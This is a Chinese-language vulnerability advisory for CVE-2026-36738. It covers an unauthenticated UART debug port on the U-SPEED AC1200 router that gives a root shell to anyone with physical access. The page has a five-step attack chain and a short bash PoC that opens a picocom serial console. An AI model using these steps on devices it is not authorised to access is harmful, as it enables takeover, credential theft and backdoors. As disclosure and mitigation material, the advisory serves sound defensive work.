CVE-2026-36738 CVSS 6.8 中危

CVE-2026-36738 U-SPEED路由器访问控制漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36738

漏洞类型

访问控制失效

CVSS评分

6.8 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K)

漏洞概述

U-SPEED AC1200千兆Wi-Fi路由器（型号T18-21K）V1.0版本存在严重的访问控制漏洞。由于设备硬件设计缺陷，暴露的UART调试接口未实施任何身份验证或授权机制。拥有设备物理访问权限的攻击者可直接连接UART引脚，进而获取系统最高权限，导致设备机密性、完整性和可用性全面受损。

技术细节

该漏洞源于硬件设计阶段的安全疏忽。在IoT设备中，UART（通用异步收发传输器）常用于调试和固件更新，通常在生产后应被禁用或通过安全机制（如JTAG锁、密码保护）进行限制。然而，U-SPEED T18-21K路由器在V1.0固件/硬件中保留了未受保护的UART接口。攻击向量为物理（AV:P），意味着攻击者必须打开设备外壳接触到PCB板上的TX/RX/GND引脚。一旦通过TTL转USB工具连接，攻击者无需任何认证即可获得root shell或Bootloader控制台。这使得攻击者能够提取敏感配置信息（如Wi-Fi密码）、修改固件植入后门，甚至导致设备永久性损坏（变砖）。

攻击链分析

STEP 1

物理获取

攻击者获得对U-SPEED路由器的物理访问权限。

STEP 2

拆解设备

打开设备外壳，暴露PCB电路板。

STEP 3

识别接口

在电路板上找到未受保护的UART调试接口引脚（TX, RX, GND）。

STEP 4

建立连接

使用USB转TTL工具连接UART接口与攻击者电脑。

STEP 5

获取权限

通过串口终端工具连接，无需认证即可获取系统Root Shell，执行任意命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-36738: UART Access on U-SPEED AC1200 Router
# Requirements: USB-to-TTL Serial Cable, picocom/minicom
# 
# 1. Identify UART pins (TX, RX, GND) on the device PCB.
# 2. Connect USB-to-TTL cable: GND->GND, RX->TX, TX->RX.
# 3. Determine baud rate (commonly 115200 for IoT devices).

BAUD_RATE=115200
SERIAL_PORT="/dev/ttyUSB0" # Adjust based on your OS

echo "[+] Connecting to UART interface at $BAUD_RATE baud..."

# Using picocom to connect (install via: apt-get install picocom)
picocom -b $BAUD_RATE $SERIAL_PORT

# Expected Result:
# A terminal shell should appear immediately without password prompt.
# Example output:
# U-Boot 1.1.3 (Jan 1 2026 - 00:00:00)
# ... (Boot messages) ...
# root@U-SPEED:/#

影响范围

U-SPEED AC1200 Gigabit Wi-Fi Router (Model: T18-21K) V1.0

防御指南

临时缓解措施

在部署环境上加强物理安全管理，确保只有授权运维人员才能接触设备硬件；同时检查设备是否有被拆解过的痕迹。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表